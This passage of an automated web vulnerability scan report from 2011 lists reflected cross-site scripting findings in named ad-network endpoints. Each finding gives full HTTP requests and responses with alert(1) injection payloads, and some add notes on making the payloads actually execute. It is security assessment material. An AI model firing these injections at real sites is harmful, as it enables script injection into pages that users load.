<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10113876922_1311108263","http://ad.doubleclick.net/adjace44'-alert(1)-'493b799af02/q1.q.boston/bus;net=q1;u=,q1-10113876922_1311108263,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250
...[SNIP]...

4.24. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc30'-alert(1)-'57aa03fe9c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.bostonccc30'-alert(1)-'57aa03fe9c8/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7277
Date: Tue, 19 Jul 2011 20:44:24 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10104673820_1311108264","http://ad.doubleclick.net/adj/q1.q.bostonccc30'-alert(1)-'57aa03fe9c8/bus;net=q1;u=,q1-10104673820_1311108264,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250",false);</s
...[SNIP]...

4.25. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e984'-alert(1)-'dd44c7ae98c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/bus7e984'-alert(1)-'dd44c7ae98c;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:25 GMT
Content-Length: 7277
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10214352090_1311108265","http://ad.doubleclick.net/adj/q1.q.boston/bus7e984'-alert(1)-'dd44c7ae98c;net=q1;u=,q1-10214352090_1311108265,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250",false);</scr'+
...[SNIP]...

4.26. http://a.collective-media.net/cmadj/q1.q.boston/bus [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0227'-alert(1)-'538d0f0dee5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/bus;sz=f0227'-alert(1)-'538d0f0dee5 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:16 GMT
Content-Length: 7260
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
t">CollectiveMedia.createAndAttachAd("q1-10120728141_1311108256","http://ad.doubleclick.net/adj/q1.q.boston/bus;net=q1;u=,q1-10120728141_1311108256,11fda490648f83c,none,q1.ent_h-q1.jobs_l;;cmw=nurl;sz=f0227'-alert(1)-'538d0f0dee5;contx=none;dc=w;btg=q1.ent_h;btg=q1.jobs_l?","f0227'-alert(1)-'538d0f0dee5","",false);</scr'+'ipt>
...[SNIP]...

4.27. http://a.netmng.com/hic/ [passback&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The scanner names the injection point passback&click; in the request line, passback is a bare name with no value and the injected text is the tail of the click parameter (the oadest field of the Undertone click-through URL). The /hic/ handler copies that click URL, unencoded, into the double-quoted SRC attribute of the IFRAME it returns. The payload a9d54"><script>alert(1)</script>747b9ccc342 was submitted there and echoed unmodified: the double quote closes the attribute and the > closes the IFRAME start tag, leaving the script element in the page body.

This proof-of-concept demonstrates that arbitrary markup, and so JavaScript, can be injected into the response. Because the response is text/html, the URL is exploitable directly by having a victim open it, with the script running in the a.netmng.com origin. One caveat for verification: an HTML5 parser treats everything between an iframe start tag and its end tag as raw text, so a script element placed there is inert; a reliable test closes the IFRAME element as well as the attribute, which the same missing encoding permits.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=a9d54"><script>alert(1)</script>747b9ccc342 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:21 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:49:21 GMT
Last-Modified: Sun, 17 Jul 2011 20:49:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=AhgqIBD6nIi0D%2BMn34ymEiZLn5OZjtoxsqxCpcC5vQgm7GZTqlc5I2oXIuUgwnU4n2plP0K0puUNNwYhuG8H75jYP1ISWL0c90Oo43tzCoLoVfrrYmwx26HZxEDcjtYQCmlA5hdBUSrdJ9%2FUHM%2B85SzRXd9lorqlEVBuXGeuwdY%3D; expires=Wed, 18-Jan-2012 20:49:21 GMT; path=/
Set-Cookie: evo5_display=6ybBSHUW4qFeA2pi6k6gGjq6S86HctbWeh9cZbJhLk43cYePIOB4VQ2mX5Rf5PzdDBRAx9n6ayvu1Tyzf7hzrQ%3D%3D; expires=Thu, 23-Jun-44591 20:49:21 GMT; path=/; domain=.netmng.com
Content-Length: 1592
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5527925;sz=728x90;click=;ord=1311108561;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=a9d54"><script>alert(1)</script>747b9ccc342;?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.28. http://a.netmng.com/hic/ [passback&click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

As the request line shows, passback carries no value; the scanner's passback&click label refers to the click parameter, whose oadest field is where the payload sits. The /hic/ handler copies the click URL, unencoded, into the double-quoted SRC attribute of the IFRAME it returns (here the B5146585.127 creative, with a pc=[TPAS_ID] macro left unexpanded). The payload c2db4"><script>alert(1)</script>d8f75878460 was submitted and echoed unmodified: the quote ends the attribute, the > ends the start tag, and the script element follows.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the response; the response is text/html, so a victim opening the URL runs it in the a.netmng.com origin. Verify with a payload that also closes the IFRAME element: HTML5 parsers treat iframe content up to the end tag as raw text, so a script element placed immediately after the prematurely closed start tag does not execute by itself.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=c2db4"><script>alert(1)</script>d8f75878460 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:48:56 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:48:56 GMT
Last-Modified: Sun, 17 Jul 2011 20:48:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=AhgqIBD6nIi0D%2BMn34ymEiZLn5OZjtoxsqxCpcC5vQgm7GZTqlc5I2oXIuUgwnU4n2plP0K0puUNNwYhuG8H73b%2BWMSS4bgT4NMNPegiWg2gzqKqyo%2BTygjivpTJSduHkiCxwBCHW8sJDNQdsByRkZ%2Bca%2FXNMPxFxzuqfYBik1k%3D; expires=Wed, 18-Jan-2012 20:48:56 GMT; path=/
Set-Cookie: evo5_display=NXTVl5Jg12H73qXg2AB994UKMGdm1eFpHgSl3bE9WM75aU%2Bt%2FiMh%2BJjrcp%2Fxd6sOu8CRr1gQYDywBmKz%2FYbePA%3D%3D; expires=Thu, 23-Jun-44591 20:48:56 GMT; path=/; domain=.netmng.com
Content-Length: 1646
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108536;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=165
...[SNIP]...
36;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=c2db4"><script>alert(1)</script>d8f75878460;?">
...[SNIP]...

4.29. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied, unencoded, into a single-quoted JavaScript string literal: the cookie-matching script is a single document.write('<img src="...">') call and the parameter lands inside the URL in that literal. The payload 16176'-alert(1)-'789f99fe84a was appended to the legitimate value 193 and echoed unmodified. The single quote ends the literal and the two minus signs turn the remainder into the expression '...'-alert(1)-'...', which calls alert(1) while the script is being evaluated.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the response. Two points for anyone verifying it: the response is application/x-javascript, so the code executes in the origin of the page that includes /usersync in a script tag (the tag.admeld.com match flow that admeld_callback points at), and a browser that honours the Content-Type will not render it as HTML when the URL is opened directly; and the sess and uuid2 cookies are set HttpOnly, so document.cookie is not the payoff here, script execution on the including page is.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=19316176'-alert(1)-'789f99fe84a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 19 Jul 2011 20:44:09 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=19316176'-alert(1)-'789f99fe84a&external_user_id=7212282717808390200&expiration=0" width="0" height="0"/>');

4.30. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is the base of the match URL that the response writes with document.write('<img src="...">'), and it is copied, unencoded, into that single-quoted JavaScript string literal. The payload ca443'-alert(1)-'8f1f478f920 was appended to http://tag.admeld.com/match and echoed unmodified; the single quote ends the literal and the subtraction operators make alert(1) execute as part of the resulting expression.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the response. The response is application/x-javascript, so the code runs in the origin of whatever page loads /usersync in a script tag with this parameter, rather than on admeld.adnxs.com when the URL is opened directly in a browser that honours the Content-Type. Escaping alone is the wrong fix for this parameter: a callback URL supplied by the caller should be validated against the expected tag.admeld.com endpoint before it is used at all.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchca443'-alert(1)-'8f1f478f920 HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 19 Jul 2011 20:44:43 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchca443'-alert(1)-'8f1f478f920?admeld_adprovider_id=193&external_user_id=7212282717808390200&expiration=0" width="0" height="0"/>');

4.31. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied, unencoded, into the single-quoted JavaScript string literal passed to document.write; the response is a cookie-matching pixel script served, oddly, as text/plain. The payload 4d7d5'%3balert(1)//a883b6014f was submitted URL-encoded and echoed after decoding as 4d7d5';alert(1)//a883b6014f.

This confirms that a single quote reaches the script unescaped, but this particular payload does not actually execute: the quote ends the literal, the semicolon arrives while document.write( is still open, and the // comments out the rest of the line including the closing '); so the whole response is a syntax error. The '-alert(1)-' form used against admeld.adnxs.com above keeps the call balanced and is the one to use to demonstrate execution here. As with that host, the code runs in the origin of the page that loads this URL in a script tag; a text/plain type does not stop a script tag from executing it, and no X-Content-Type-Options header is sent.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=734d7d5'%3balert(1)//a883b6014f&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:29 GMT
Expires: Tue, 19 Jul 2011 20:44:30 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:30 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:30 GMT; Path=/
Content-Type: text/plain
Content-Length: 191
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=734d7d5';alert(1)//a883b6014f&external_user_id=3449391312096071132"/>');

4.32. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is used, unencoded, as the base of the match URL inside the single-quoted JavaScript string literal passed to document.write, in a response served as text/plain. The payload bba35'%3balert(1)//26ade494141 was submitted URL-encoded and echoed after decoding as bba35';alert(1)//26ade494141.

The reflection is real and the quote is not escaped, but as echoed this payload does not run: document.write( is left unclosed when the semicolon arrives, and the // comments out the closing '); so the script fails to parse. A payload that keeps the call balanced, such as the '-alert(1)-' form used in 4.29 and 4.30, demonstrates execution; it then runs in the origin of any page that loads this URL in a script tag. The parameter is a caller-supplied URL, so validating it against the expected tag.admeld.com endpoint is the fix, with string escaping as defence in depth.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbba35'%3balert(1)//26ade494141 HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:34 GMT
Expires: Tue, 19 Jul 2011 20:44:34 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:34 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:34 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

